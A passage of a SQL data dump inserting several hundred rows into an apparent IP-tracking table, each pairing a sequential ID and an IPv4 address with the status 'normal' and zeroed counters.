199.244.88.222','normal','',0,0,0,0,0,'[]'),(740,'136.243.8.158','normal','',0,0,0,0,0,'[]'),(741,'77.246.183.77','normal','',0,0,0,0,0,'[]'),(742,'223.62.240.33','normal','',0,0,0,0,0,'[]'),(743,'188.165.241.181','normal','',0,0,0,0,0,'[]'),(744,'104.236.45.171','normal','',0,0,0,0,0,'[]'),(745,'47.106.201.134','normal','',0,0,0,0,0,'[]'),(746,'159.65.147.193','normal','',0,0,0,0,0,'[]'),(747,'193.56.29.219','normal','',0,0,0,0,0,'[]'),(748,'209.182.195.110','normal','',0,0,0,0,0,'[]'),(749,'211.249.40.21','normal','',0,0,0,0,0,'[]'),(750,'93.113.111.193','normal','',0,0,0,0,0,'[]'),(751,'67.222.152.219','normal','',0,0,0,0,0,'[]'),(752,'136.243.78.165','normal','',0,0,0,0,0,'[]'),(753,'23.230.235.188','normal','',0,0,0,0,0,'[]'),(754,'23.230.235.91','normal','',0,0,0,0,0,'[]'),(755,'23.230.235.12','normal','',0,0,0,0,0,'[]'),(756,'23.230.235.4','normal','',0,0,0,0,0,'[]'),(757,'23.230.235.211','normal','',0,0,0,0,0,'[]'),(758,'23.230.235.117','normal','',0,0,0,0,0,'[]'),(759,'23.230.235.70','normal','',0,0,0,0,0,'[]'),(760,'23.230.235.110','normal','',0,0,0,0,0,'[]'),(761,'23.230.235.110','normal','',0,0,0,0,0,'[]'),(762,'23.230.235.165','normal','',0,0,0,0,0,'[]'),(763,'23.230.235.145','normal','',0,0,0,0,0,'[]'),(764,'23.230.235.40','normal','',0,0,0,0,0,'[]'),(765,'23.230.235.66','normal','',0,0,0,0,0,'[]'),(766,'23.230.235.154','normal','',0,0,0,0,0,'[]'),(767,'23.230.235.49','normal','',0,0,0,0,0,'[]'),(768,'23.230.235.44','normal','',0,0,0,0,0,'[]'),(769,'20.207.80.198','normal','',0,0,0,0,0,'[]'),(770,'47.111.84.214','normal','',0,0,0,0,0,'[]'),(771,'45.120.69.121','normal','',0,0,0,0,0,'[]'),(772,'51.38.113.53','normal','',0,0,0,0,0,'[]'),(773,'66.249.73.189','normal','',0,0,0,0,0,'[]'),(774,'54.38.38.23','normal','',0,0,0,0,0,'[]'),(775,'208.109.54.127','normal','',0,0,0,0,0,'[]'),(776,'93.113.111.100','normal','',0,0,0,0,0,'[]'),(777,'62.171.155.105','normal','',0,0,0,0,0,'[]'),(778,'139.59.13.55','normal','',0,0,0,0,0,'[]'),(779,'65.108.156.93','normal','',0,0,0,0,0,'[]'),(780,'64.124.8.40','normal','',0,0,0,0,0,'[]'),(781,'72.52.228.2','normal','',0,0,0,0,0,'[]'),(782,'149.56.150.130','normal','',0,0,0,0,0,'[]'),(783,'149.56.150.207','normal','',0,0,0,0,0,'[]'),(784,'114.132.250.235','normal','',0,0,0,0,0,'[]'),(785,'18.191.48.31','normal','',0,0,0,0,0,'[]'),(786,'157.245.44.162','normal','',0,0,0,0,0,'[]'),(787,'68.183.86.247','normal','',0,0,0,0,0,'[]'),(788,'144.126.136.150','normal','',0,0,0,0,0,'[]'),(789,'137.184.117.52','normal','',0,0,0,0,0,'[]'),(790,'213.149.103.132','normal','',0,0,0,0,0,'[]'),(791,'103.90.232.106','normal','',0,0,0,0,0,'[]'),(792,'173.252.87.8','normal','',0,0,0,0,0,'[]'),(793,'173.252.87.117','normal','',0,0,0,0,0,'[]'),(794,'173.252.87.14','normal','',0,0,0,0,0,'[]'),(795,'173.252.87.113','normal','',0,0,0,0,0,'[]'),(796,'173.252.87.1','normal','',0,0,0,0,0,'[]'),(797,'139.59.228.23','normal','',0,0,0,0,0,'[]'),(798,'68.183.71.174','normal','',0,0,0,0,0,'[]'),(799,'27.254.194.202','normal','',0,0,0,0,0,'[]'),(800,'192.99.201.91','normal','',0,0,0,0,0,'[]'),(801,'77.75.79.54','normal','',0,0,0,0,0,'[]'),(802,'198.136.54.132','normal','',0,0,0,0,0,'[]'),(803,'42.200.109.156','normal','',0,0,0,0,0,'[]'),(804,'45.79.120.96','normal','',0,0,0,0,0,'[]'),(805,'217.160.92.125','normal','',0,0,0,0,0,'[]'),(806,'77.75.78.169','normal','',0,0,0,0,0,'[]'),(807,'114.119.152.207','normal','',0,0,0,0,0,'[]'),(808,'188.166.225.235','normal','',0,0,0,0,0,'[]'),(809,'34.67.96.123','normal','',0,0,0,0,0,'[]'),(810,'66.249.73.168','normal','',0,0,0,0,0,'[]'),(811,'66.249.73.165','normal','',0,0,0,0,0,'[]'),(812,'20.127.196.24','normal','',0,0,0,0,0,'[]'),(813,'149.102.128.25','normal','',0,0,0,0,0,'[]'),(814,'107.122.245.21','normal','',0,0,0,0,0,'[]'),(815,'107.122.245.21','normal','',0,0,0,0,0,'[]'),(816,'77.75.79.109','normal','',0,0,0,0,0,'[]'),(817,'45.222.124.38','normal','',0,0,0,0,0,'[]'),(818,'54.36.148.237','normal','',0,0,0,0,0,'[]'),(819,'103.103.175.102','normal','',0,0,0,0,0,'[]'),(820,'77.75.78.161','normal','',0,0,0,0,0,'[]'),(821,'15.235.133.202','normal','',0,0,0,0,0,'[]'),(822,'77.75.76.164','normal','',0,0,0,0,0,'[]'),(823,'1.117.250.215','normal','',0,0,0,0,0,'[]'),(824,'77.75.78.167','normal','',0,0,0,0,0,'[]'),(825,'188.166.61.228','normal','',0,0,0,0,0,'[]'),(826,'66.128.39.202','normal','',0,0,0,0,0,'[]'),(827,'207.154.250.8','normal','',0,0,0,0,0,'[]'),(828,'54.36.149.78','normal','',0,0,0,0,0,'[]'),(829,'54.36.148.179','normal','',0,0,0,0,0,'[]'),(830,'66.33.193.231','normal','',0,0,0,0,0,'[]'),(831,'54.187.217.185','normal','',0,0,0,0,0,'[]'),(832,'35.90.152.155','normal','',0,0,0,0,0,'[]'),(833,'77.75.78.168','normal','',0,0,0,0,0,'[]'),(834,'46.101.103.136','normal','',0,0,0,0,0,'[]'),(835,'147.182.249.22','normal','',0,0,0,0,0,'[]'),(836,'77.75.79.11','normal','',0,0,0,0,0,'[]'),(837,'120.29.87.219','normal','',0,0,0,0,0,'[]'),(838,'120.29.87.219','normal','',0,0,0,0,0,'[]'),(839,'114.119.138.36','normal','',0,0,0,0,0,'[]'),(840,'34.69.109.132','normal','',0,0,0,0,0,'[]'),(841,'111.230.202.147','normal','',0,0,0,0,0,'[]'),(842,'104.131.68.19','normal','',0,0,0,0,0,'[]'),(843,'94.231.86.20','normal','',0,0,0,0,0,'[]'),(844,'82.166.23.245','normal','',0,0,0,0,0,'[]'),(845,'154.37.180.139','normal','',0,0,0,0,0,'[]'),(846,'154.13.24.164','normal','',0,0,0,0,0,'[]'),(847,'20.168.59.74','normal','',0,0,0,0,0,'[]'),(848,'172.58.122.108','normal','',0,0,0,0,0,'[]'),(849,'52.232.62.54','normal','',0,0,0,0,0,'[]'),(850,'93.158.91.235','normal','',0,0,0,0,0,'[]'),(851,'93.158.91.249','normal','',0,0,0,0,0,'[]'),(852,'93.158.91.252','normal','',0,0,0,0,0,'[]'),(853,'93.158.92.11','normal','',0,0,0,0,0,'[]'),(854,'199.244.88.226','normal','',0,0,0,0,0,'[]'),(855,'40.77.190.211','normal','',0,0,0,0,0,'[]'),(856,'40.77.189.228','normal','',0,0,0,0,0,'[]'),(857,'185.245.183.146','normal','',0,0,0,0,0,'[]'),(858,'44.207.124.84','normal','',0,0,0,0,0,'[]'),(859,'185.244.214.45','normal','',0,0,0,0,0,'[]'),(860,'38.128.66.69','normal','',0,0,0,0,0,'[]'),(861,'220.180.207.216','normal','',0,0,0,0,0,'[]'),(862,'188.166.163.52','normal','',0,0,0,0,0,'[]'),(863,'64.124.8.44','normal','',0,0,0,0,0,'[]'),(864,'5.188.62.76','normal','',0,0,0,0,0,'[]'),(865,'114.119.143.226','normal','',0,0,0,0,0,'[]'),(866,'54.36.148.204','normal','',0,0,0,0,0,'[]'),(867,'51.68.11.239','normal','',0,0,0,0,0,'[]'),(868,'51.68.11.239','normal','',0,0,0,0,0,'[]'),(869,'198.71.228.40','normal','',0,0,0,0,0,'[]'),(870,'46.242.238.35','normal','',0,0,0,0,0,'[]'),(871,'184.168.99.226','normal','',0,0,0,0,0,'[]'),(872,'68.183.91.154','normal','',0,0,0,0,0,'[]'),(873,'141.94.87.67','normal','',0,0,0,0,0,'[]'),(874,'51.255.164.109','normal','',0,0,0,0,0,'[]'),(875,'216.69.169.37','normal','',0,0,0,0,0,'[]'),(876,'216.69.169.37','normal','',0,0,0,0,0,'[]'),(877,'93.189.24.54','normal','',0,0,0,0,0,'[]'),(878,'178.254.17.171','normal','',0,0,0,0,0,'[]'),(879,'178.254.17.171','normal','',0,0,0,0,0,'[]'),(880,'51.68.11.227','normal','',0,0,0,0,0,'[]'),(881,'50.62.176.86','normal','',0,0,0,0,0,'[]'),(882,'202.172.28.158','normal','',0,0,0,0,0,'[]'),(883,'50.62.141.61','normal','',0,0,0,0,0,'[]'),(884,'5.77.50.166','normal','',0,0,0,0,0,'[]'),(885,'46.243.69.2','normal','',0,0,0,0,0,'[]'),(886,'195.74.38.128','normal','',0,0,0,0,0,'[]'),(887,'51.68.11.215','normal','',0,0,0,0,0,'[]'),(888,'204.197.248.115','normal','',0,0,0,0,0,'[]'),(889,'51.68.11.203','normal','',0,0,0,0,0,'[]'),(890,'5.187.48.137','normal','',0,0,0,0,0,'[]'),(891,'167.94.138.62','normal','',0,0,0,0,0,'[]'),(892,'18.196.112.55','normal','',0,0,0,0,0,'[]'),(893,'91.224.23.225','normal','',0,0,0,0,0,'[]'),(894,'112.80.139.131','normal','',0,0,0,0,0,'[]'),(895,'20.168.91.40','normal','',0,0,0,0,0,'[]'),(896,'54.36.148.16','normal','',0,0,0,0,0,'[]'),(897,'54.36.148.231','normal','',0,0,0,0,0,'[]'),(898,'54.147.100.98','normal','',0,0,0,0,0,'[]'),(899,'95.108.213.45','normal','',0,0,0,0,0,'[]'),(900,'176.100.4.51','normal','',0,0,0,0,0,'[]'),(901,'114.119.136.196','normal','',0,0,0,0,0,'[]'),(902,'199.247.12.230','normal','',0,0,0,0,0,'[]'),(903,'159.65.250.86','normal','',0,0,0,0,0,'[]'),(904,'23.230.235.187','normal','',0,0,0,0,0,'[]'),(905,'23.230.235.187','normal','',0,0,0,0,0,'[]'),(906,'23.230.235.124','normal','',0,0,0,0,0,'[]'),(907,'23.230.235.159','normal','',0,0,0,0,0,'[]'),(908,'23.230.235.27','normal','',0,0,0,0,0,'[]'),(909,'23.230.235.159','normal','',0,0,0,0,0,'[]'),(910,'139.9.169.41','normal','',0,0,0,0,0,'[]'),(911,'54.189.169.2','normal','',0,0,0,0,0,'[]'),(912,'54.212.126.60','normal','',0,0,0,0,0,'[]'),(913,'81.19.140.13','normal','',0,0,0,0,0,'[]'),(914,'81.19.140.13','normal','',0,0,0,0,0,'[]'),(915,'176.31.125.95','normal','',0,0,0,0,0,'[]'),(916,'54.36.149.99','normal','',0,0,0,0,0,'[]'),(917,'18.232.117.124','normal','',0,0,0,0,0,'[]'),(918,'180.76.102.66','normal','',0,0,0,0,0,'[]'),(919,'35.243.196.235','normal','',0,0,0,0,0,'[]'),(920,'3.68.233.16','normal','',0,0,0,0,0,'[]'),(921,'94.23.7.188','normal','',0,0,0,0,0,'[]'),(922,'5.255.253.140','normal','',0,0,0,0,0,'[]'),(923,'3.239.90.233','normal','',0,0,0,0,0,'[]'),(924,'38.242.144.249','normal','',0,0,0,0,0,'[]'),(925,'20.90.147.106','normal','',0,0,0,0,0,'[]'),(926,'20.13.130.49','normal','',0,0,0,0,0,'[]'),(927,'104.251.85.189','normal','',0,0,0,0,0,'[]'),(928,'23.106.22.62','normal','',0,0,0,0,0,'[]'),(929,'114.119.151.155','normal','',0,0,0,0,0,'[]'),(930,'20.168.45.122','normal','',0,0,0,0,0,'[]'),(931,'130.44.225.62','normal','',0,0,0,0,0,'[]'),(932,'130.44.225.62','normal','',0,0,0,0,0,'[]'),(933,'35.199.158.228','normal','',0,0,0,0,0,'[]'),(934,'147.189.172.209','normal','',0,0,0,0,0,'[]'),(935,'35.129.28.63','normal','',0,0,0,0,0,'[]'),(936,'77.75.79.31','normal','',0,0,0,0,0,'[]'),(937,'54.36.148.136','normal','',0,0,0,0,0,'[]'),(938,'213.152.161.244','normal','',0,0,0,0,0,'[]'),(939,'167.248.133.44','normal','',0,0,0,0,0,'[]'),(940,'167.248.133.44','normal','',0,0,0,0,0,'[]'),(941,'45.55.44.162','normal','',0,0,0,0,0,'[]'),(942,'114.119.154.30','normal','',0,0,0,0,0,'[]'),(943,'207.46.13.35','normal','',0,0,0,0,0,'[]'),(944,'5.101.157.235','normal','',0,0,0,0,0,'[]'),(945,'45.154.138.63','normal','',0,0,0,0,0,'[]'),(946,'185.180.143.47','normal','',0,0,0,0,0,'[]'),(947,'20.83.123.89','normal','',0,0,0,0,0,'[]'),(948,'45.227.254.11','normal','',0,0,0,0,0,'[]'),(949,'23.230.235.153','normal','',0,0,0,0,0,'[]'),(950,'23.230.235.164','normal','',0,0,0,0,0,'[]'),(951,'23.230.235.194','normal','',0,0,0,0,0,'[]'),(952,'23.230.235.136','normal','',0,0,0,0,0,'[]'),(953,'23.230.235.78','normal','',0,0,0,0,0,'[]'),(954,'23.230.235.170','normal','',0,0,0,0,0,'[]'),(955,'23.230.235.133','normal','',0,0,0,0,0,'[]'),(956,'23.230.235.221','normal','',0,0,0,0,0,'[]'),(957,'23.230.235.198','normal','',0,0,0,0,0,'[]'),(958,'23.230.235.112','normal','',0,0,0,0,0,'[]'),(959,'23.230.235.245','normal','',0,0,0,0,0,'[]'),(960,'23.230.235.9','normal','',0,0,0,0,0,'[]'),(961,'23.230.235.193','normal','',0,0,0,0,0,'[]'),(962,'23.230.235.232','normal','',0,0,0,0,0,'[]'),(963,'23.230.235.205','normal','',0,0,0,0,0,'[]'),(964,'23.230.235.174','normal','',0,0,0,0,0,'[]'),(965,'23.230.235.131','normal','',0,0,0,0,0,'[]'),(966,'23.230.235.126','normal','',0,0,0,0,0,'[]'),(967,'23.230.235.67','normal','',0,0,0,0,0,'[]'),(968,'23.230.235.181','normal','',0,0,0,0,0,'[]'),(969,'23.230.235.209','normal','',0,0,0,0,0,'[]'),(970,'23.230.235.35','normal','',0,0,0,0,0,'[]'),(971,'23.230.235.140','normal','',0,0,0,0,0,'[]'),(972,'23.230.235.157','normal','',0,0,0,0,0,'[]'),(973,'23.230.235.58','normal','',0,0,0,0,0,'[]'),(974,'23.230.235.236','normal','',0,0,0,0,0,'[]'),(975,'188.134.68.55','normal','',0,0,0,0,0,'[]'),(976,'40.77.167.99','normal','',0,0,0,0,0,'[]'),(977,'157.55.39.88','normal','',0,0,0,0,0,'[]'),(978,'154.6.12.156','normal','',0,0,0,0,0,'[]'),(979,'188.166.236.35','normal','',0,0,0,0,0,'[]'),(980,'185.46.121.66','normal','',0,0,0,0,0,'[]'),(981,'87.250.224.103','normal','',0,0,0,0,0,'[]'),(982,'207.154.234.6','normal','',0,0,0,0,0,'[]'),(983,'131.255.7.10','normal','',0,0,0,0,0,'[]'),(984,'203.118.155.133','normal','',0,0,0,0,0,'[]'),(985,'54.69.177.5','normal','',0,0,0,0,0,'[]'),(986,'195.211.45.155','normal','',0,0,0,0,0,'[]'),(987,'103.171.180.139','normal','',0,0,0,0,0,'[]'),(988,'15.235.168.187','normal','',0,0,0,0,0,'[]'),(989,'198.136.61.181','normal','',0,0,0,0,0,'[]'),(990,'34.123.125.44','normal','',0,0,0,0,0,'[]'),(991,'80.77.135.125','normal','',0,0,0,0,0,'[]'),(992,'158.255.80.210','normal','',0,0,0,0,0,'[]'),(993,'50.202.38.5','normal','',0,0,0,0,0,'[]'),(994,'91.123.18.217','normal','',0,0,0,0,0,'[]'),(995,'140.143.188.163','normal','',0,0,0,0,0,'[]'),(996,'89.208.107.12','normal','',0,0,0,0,0,'[]'),(997,'89.208.107.12','normal','',0,0,0,0,0,'[]'),(998,'178.128.104.173','normal','',0,0,0,0,0,'[]'),(999,'20.101.71.221','normal','',0,0,0,0,0,'[]'),(1000,'13.126.36.87','normal','',0,0,0,0,0,'[]'),(1001,'54.184.177.144','normal','',0,0,0,0,0,'[]'),(1002,'207.55.255.20','normal','',0,0,0,0,0,'[]'),(1003,'54.187.211.218','normal','',0,0,0,0,0,'[]'),(1004,'64.227.40.128','normal','',0,0,0,0,0,'[]'),(1005,'79.137.65.179','normal','',0,0,0,0,0,'[]'),(1006,'47.116.48.109','normal','',0,0,0,0,0,'[]'),(1007,'81.88.52.166','normal','',0,0,0,0,0,'[]'),(1008,'159.223.43.66','normal','',0,0,0,0,0,'[]'),(1009,'89.252.168.200','normal','',0,0,0,0,0,'[]'),(1010,'149.129.181.108','normal','',0,0,0,0,0,'[]'),(1011,'46.182.4.117','normal','',0,0,0,0,0,'[]'),(1012,'194.56.190.57','normal','',0,0,0,0,0,'[]'),(1013,'213.165.237.48','normal','',0,0,0,0,0,'[]'),(1014,'82.165.18.75','normal','',0,0,0,0,0,'[]'),(1015,'92.119.156.31','normal','',0,0,0,0,0,'[]'),(1016,'62.90.101.113','normal','',0,0,0,0,0,'[]'),(1017,'142.93.170.99','normal','',0,0,0,0,0,'[]'),(1018,'207.154.204.99','normal','',0,0,0,0,0,'[]'),(1019,'184.168.121.5','normal','',0,0,0,0,0,'[]'),(1020,'139.59.20.111','normal','',0,0,0,0,0,'[]'),(1021,'207.46.13.44','normal','',0,0,0,0,0,'[]'),(1022,'35.224.216.78','normal','',0,0,0,0,0,'[]'),(1023,'67.222.154.106','normal','',0,0,0,0,0,'[]'),(1024,'47.115.24.165','normal','',0,0,0,0,0,'[]'),(1025,'85.119.122.23','normal','',0,0,0,0,0,'[]'),(1026,'64.124.8.58','normal','',0,0,0,0,0,'[]'),(1027,'103.145.50.162','normal','',0,0,0,0,0,'[]'),(1028,'159.203.68.240','normal','',0,0,0,0,0,'[]'),(1029,'194.233.66.131','normal','',0,0,0,0,0,'[]'),(1030,'8.210.102.36','normal','',0,0,0,0,0,'[]'),(1031,'116.203.222.121','normal','',0,0,0,0,0,'[]'),(1032,'159.65.149.229','normal','',0,0,0,0,0,'[]'),(1033,'51.38.80.81','normal','',0,0,0,0,0,'[]'),(1034,'104.219.251.247','normal','',0,0,0,0,0,'[]'),(1035,'164.68.99.251','normal','',0,0,0,0,0,'[]'),(1036,'185.153.8.103','normal','',0,0,0,0,0,'[]'),(1037,'87.236.20.246','normal','',0,0,0,0,0,'[]'),(1038,'133.130.103.36','normal','',0,0,0,0,0,'[]'),(1039,'139.59.117.30','normal','',0,0,0,0,0,'[]'),(1040,'35.82.12.197','normal','',0,0,0,0,0,'[]'),(1041,'35.198.25.12','normal','',0,0,0,0,0,'[]'),(1042,'91.103.219.224','normal','',0,0,0,0,0,'[]'),(1043,'192.163.194.31','normal','',0,0,0,0,0,'[]'),(1044,'162.214.156.228','normal','',0,0,0,0,0,'[]'),(1045,'136.243.214.233','normal','',0,0,0,0,0,'[]'),(1046,'34.64.218.102','normal','',0,0,0,0,0,'[]'),(1047,'184.171.244.176','normal','',0,0,0,0,0,'[]'),(1048,'194.242.10.226','normal','',0,0,0,0,0,'[]'),(1049,'5.189.159.246','normal','',0,0,0,0,0,'[]'),(1050,'142.44.170.220','normal','',0,0,0,0,0,'[]'),(1051,'139.59.96.126','normal','',0,0,0,0,0,'[]'),(1052,'162.142.125.221','normal','',0,0,0,0,0,'[]'),(1053,'162.142.125.221','normal','',0,0,0,0,0,'[]'),(1054,'185.183.122.143','normal','',0,0,0,0,0,'[]'),(1055,'185.49.20.77','normal','',0,0,0,0,0,'[]'),(1056,'51.195.148.190','normal','',0,0,0,0,0,'[]'),(1057,'121.42.231.47','normal','',0,0,0,0,0,'[]'),(1058,'101.0.73.142','normal','',0,0,0,0,0,'[]'),(1059,'103.149.154.8','normal','',0,0,0,0,0,'[]'),(1060,'202.52.48.206','normal','',0,0,0,0,0,'[]'),(1061,'138.197.144.236','normal','',0,0,0,0,0,'[]'),(1062,'192.210.196.65','normal','',0,0,0,0,0,'[]'),(1063,'64.235.231.20','normal','',0,0,0,0,0,'[]'),(1064,'140.246.255.164','normal','',0,0,0,0,0,'[]'),(1065,'115.78.122.58','normal','',0,0,0,0,0,'[]'),(1066,'77.75.73.26','normal','',0,0,0,0,0,'[]'),(1067,'173.236.242.233','normal','',0,0,0,0,0,'[]'),(1068,'106.14.141.22','normal','',0,0,0,0,0,'[]'),(1069,'52.144.59.143','normal','',0,0,0,0,0,'[]'),(1070,'190.145.68.131','normal','',0,0,0,0,0,'[]'),(1071,'184.168.126.242','normal','',0,0,0,0,0,'[]'),(1072,'139.59.118.238','normal','',0,0,0,0,0,'[]'),(1073,'164.92.199.45','normal','',0,0,0,0,0,'[]'),(1074,'54.36.149.56','normal','',0,0,0,0,0,'[]'),(1075,'207.188.152.249','normal','',0,0,0,0,0,'[]'),(1076,'157.55.39.84','normal','',0,0,0,0,0,'[]'),(1077,'185.2.5.77','normal','',0,0,0,0,0,'[]'),(1078,'161.35.36.28','normal','',0,0,0,0,0,'[]'),(1079,'69.163.186.158','normal','',0,0,0,0,0,'[]'),(1080,'80.150.6.150','normal','',0,0,0,0,0,'[]'),(1081,'187.32.211.193','normal','',0,0,0,0,0,'[]'),(1082,'111.231.200.129','normal','',0,0,0,0,0,'[]'),(1083,'209.141.35.128','normal','',0,0,0,0,0,'[]'),(1084,'40.113.137.99','normal','',0,0,0,0,0,'[]'),(1085,'103.129.222.91','normal','',0,0,0,0,0,'[]'),(1086,'157.7.174.49','normal','',0,0,0,0,0,'[]'),(1087,'168.138.186.59','normal','',0,0,0,0,0,'[]'),(1088,'161.97.100.231','normal','',0,0,0,0,0,'[]'),(1089,'151.80.20.26','normal','',0,0,0,0,0,'[]'),(1090,'171.244.16.103','normal','',0,0,0,0,0,'[]'),(1091,'51.210.251.22','normal','',0,0,0,0,0,'[]'),(1092,'185.197.195.173','normal','',0,0,0,0,0,'[]'),(1093,'103.92.27.198','normal','',0,0,0,0,0,'[]'),(1094,'114.132.201.19','normal','',0,0,0,0,0,'[]'),(1095,'111.90.150.171','normal','',0,0,0,0,0,'[]'),(1096,'111.90.150.28','normal','',0,0,0,0,0,'[]'),(1097,'34.75.65.218','normal','',0,0,0,0,0,'[]'),(1098,'103.35.64.73','normal','',0,0,0,0,0,'[]'),(1099,'157.0.140.186','normal','',0,0,0,0,0,'[]'),(1100,'54.249.241.32','normal','',0,0,0,0,0,'[]'),(1101,'69.163.196.200','normal','',0,0,0,0,0,'[]'),(1102,'209.145.54.181','normal','',0,0,0,0,0,'[]'),(1103,'20.119.96.169','normal','',0,0,0,0,0,'[]'),(1104,'198.54.130.46','normal','',0,0,0,0,0,'[]'),(1105,'70.34.213.124','normal','',0,0,0,0,0,'[]'),(1106,'103.130.219.13','normal','',0,0,0,0,0,'[]'),(1107,'192.227.178.147','normal','',0,0,0,0,0,'[]'),(1108,'139.59.122.66','normal','',0,0,0,0,0,'[]'),(1109,'177.52.160.29','normal','',0,0,0,0,0,'[]'),(1110,'167.71.106.216','normal','',0,0,0,0,0,'[]'),(1111,'124.158.12.83','normal','',0,0,0,0,0,'[]'),(1112,'121.243.95.160','normal','',0,0,0,0,0,'[]'),(1113,'64.227.187.183','normal','',0,0,0,0,0,'[]'),(1114,'162.222.225.160','normal','',0,0,0,0,0,'[]'),(1115,'159.223.186.76','normal','',0,0,0,0,0,'[]'),(1116,'159.203.31.171','normal','',0,0,0,0,0,'[]'),(1117,'85.191.40.94','normal','',0,0,0,0,0,'[]'),(1118,'165.22.194.243','normal','',0,0,0,0,0,'[]'),(1119,'41.93.82.7','normal','',0,0,0,0,0,'[]'),(1120,'158.69.26.40','normal','',0,0,0,0,0,'[]'),(1121,'185.104.44.58','normal','',0,0,0,0,0,'[]'),(1122,'130.61.143.194','normal','',0,0,0,0,0,'[]'),(1123,'108.167.132.70','normal','',0,0,0,0,0,'[]'),(1124,'103.204.128.101','normal','',0,0,0,0,0,'[]'),(1125,'185.10.70.154','normal','',0,0,0,0,0,'[]'),(1126,'51.210.134.180','normal','',0,0,0,0,0,'[]'),(1127,'209.126.8.92','normal','',0,0,0,0,0,'[]'),(1128,'45.125.239.179','normal','',0,0,0,0,0,'[]'),(1129,'162.0.216.67','normal','',0,0,0,0,0,'[]'),(1130,'179.127.29.102','normal','',0,0,0,0,0,'[]'),(1131,'150.230.247.143','normal','',0,0,0,0,0,'[]'),(1132,'103.90.235.91','normal','',0,0,0,0,0,'[]'),(1133,'81.88.52.223','normal','',0,0,0,0,0,'[]'),(1134,'80.251.219.111','normal','',0,0,0,0,0,'[]'),(1135,'64.31.14.78','normal','',0,0,0,0,0,'[]'),(1136,'107.180.103.185','normal','',0,0,0,0,0,'[]'),(1137,'147.139.178.177','normal','',0,0,0,0,0,'[]'),(1138,'194.163.132.194','normal','',0,0,0,0,0,'[]'),(1139,'45.251.112.118','normal','',0,0,0,0,0,'[]'),(1140,'194.163.159.35','normal','',0,0,0,0,0,'[]'),(1141,'103.154.177.165','normal','',0,0,0,0,0,'[]'),(1142,'103.98.152.12','normal','',0,0,0,0,0,'[]'),(1143,'194.44.53.72','normal','',0,0,0,0,0,'[]'),(1144,'47.57.186.73','normal','',0,0,0,0,0,'[]'),(1145,'34.214.128.195','normal','',0,0,0,0,0,'[]'),(1146,'54.200.166.186','normal','',0,0,0,0,0,'[]'),(1147,'52.34.209.15','normal','',0,0,0,0,0,'[]'),(1148,'35.87.81.43','normal','',0,0,0,0,0,'[]'),(1149,'162.241.174.216','normal','',0,0,0,0,0,'[]'),(1150,'54.39.45.92','normal','',0,0,0,0,0,'[]'),(1151,'150.95.113.161','normal','',0,0,0,0,0,'[]'),(1152,'103.27.238.234','normal','',0,0,0,0,0,'[]'),(1153,'85.146.18.88','normal','',0,0,0,0,0,'[]'),(1154,'111.90.150.36','normal','',0,0,0,0,0,'[]'),(1155,'185.182.89.35','normal','',0,0,0,0,0,'[]'),(1156,'192.64.113.147','normal','',0,0,0,0,0,'[]'),(1157,'212.33.197.207','normal','',0,0,0,0,0,'[]'),(1158,'156.238.5.204','normal','',0,0,0,0,0,'[]'),(1159,'81.88.53.17','normal','',0,0,0,0,0,'[]'),(1160,'101.43.127.191','normal','',0,0,0,0,0,'[]'),(1161,'114.119.154.6','normal','',0,0,0,0,0,'[]'),(1162,'47.104.66.61','normal','',0,0,0,0,0,'[]'),(1163,'31.184.242.14','normal','',0,0,0,0,0,'[]'),(1164,'162.144.49.214','normal','',0,0,0,0,0,'[]'),(1165,'94.154.239.69','normal','',0,0,0,0,0,'[]'),(1166,'193.176.230.188','normal','',0,0,0,0,0,'[]'),(1167,'45.76.154.199','normal','',0,0,0,0,0,'[]'),(1168,'116.62.155.4','normal','',0,0,0,0,0,'[]'),(1169,'74.208.103.228','normal','',0,0,0,0,0,'[]'),(1170,'54.201.232.193','normal','',0,0,0,0,0,'[]'),(1171,'194.233.67.171','normal','',0,0,0,0,0,'[]'),(1172,'5.189.150.204','normal','',0,0,0,0,0,'[]'),(1173,'144.217.15.207','normal','',0,0,0,0,0,'[]'),(1174,'190.107.177.243','normal','',0,0,0,0,0,'[]'),(1175,'212.38.40.215','normal','',0,0,0,0,0,'[]'),(1176,'172.104.81.115','normal','',0,0,0,0,0,'[]'),(1177,'109.233.192.83','normal','',0,0,0,0,0,'[]'),(1178,'157.230.127.126','normal','',0,0,0,0,0,'[]'),(1179,'161.97.88.147','normal','',0,0,0,0,0,'[]'),(1180,'47.107.33.26','normal','',0,0,0,0,0,'[]'),(1181,'18.224.85.64','normal','',0,0,0,0,0,'[]'),(1182,'137.184.89.163','normal','',0,0,0,0,0,'[]'),(1183,'161.35.103.104','normal','',0,0,0,0,0,'[]'),(1184,'185.49.20.75','normal','',0,0,0,0,0,'[]'),(1185,'118.98.64.188','normal','',0,0,0,0,0,'[]'),(1186,'92.0.130.43','normal','',0,0,0,0,0,'[]'),(1187,'162.214.105.251','normal','',0,0,0,0,0,'[]'),(1188,'51.210.53.165','normal','',0,0,0,0,0,'[]'),(1189,'123.56.59.9','normal','',0,0,0,0,0,'[]'),(1190,'47.98.207.210','normal','',0,0,0,0,0,'[]'),(1191,'210.17.255.218','normal','',0,0,0,0,0,'[]'),(1192,'181.214.173.89','normal','',0,0,0,0,0,'[]'),(1193,'151.106.116.118','normal','',0,0,0,0,0,'[]'),(1194,'104.236.171.249','normal','',0,0,0,0,0,'[]'),(1195,'164.46.122.50','normal','',0,0,0,0,0,'[]'),(1196,'162.240.28.177','normal','',0,0,0,0,0,'[]'),(1197,'142.93.54.10','normal','',0,0,0,0,0,'[]'),(1198,'47.114.72.18','normal','',0,0,0,0,0,'[]'),(1199,'193.235.141.170','normal','',0,0,0,0,0,'[]'),(1200,'54.36.148.157','normal','',0,0,0,0,0,'[]'),(1201,'161.35.126.102','normal','',0,0,0,0,0,'[]'),(1202,'146.148.44.185','normal','',0,0,0,0,0,'[]'),(1203,'107.175.111.233','normal','',0,0,0,0,0,'[]'),(1204,'162.214.155.200','normal','',0,0,0,0,0,'[]'),(1205,'122.17.148.164','normal','',0,0,0,0,0,'[]'),(1206,'20.171.68.237','normal','',0,0,0,0,0,'[]'),(1207,'192.185.81.201','normal','',0,0,0,0,0,'[]'),(1208,'162.241.225.246','normal','',0,0,0,0,0,'[]'),(1209,'198.57.247.140','normal','',0,0,0,0,0,'[]'),(1210,'162.241.225.120','normal','',0,0,0,0,0,'[]'),(1211,'178.62.33.222','normal','',0,0,0,0,0,'[]'),(1212,'108.167.189.100','normal','',0,0,0,0,0,'[]'),(1213,'54.168.111.47','normal','',0,0,0,0,0,'[]'),(1214,'196.44.176.39','normal','',0,0,0,0,0,'[]'),(1215,'142.93.201.0','normal','',0,0,0,0,0,'[]'),(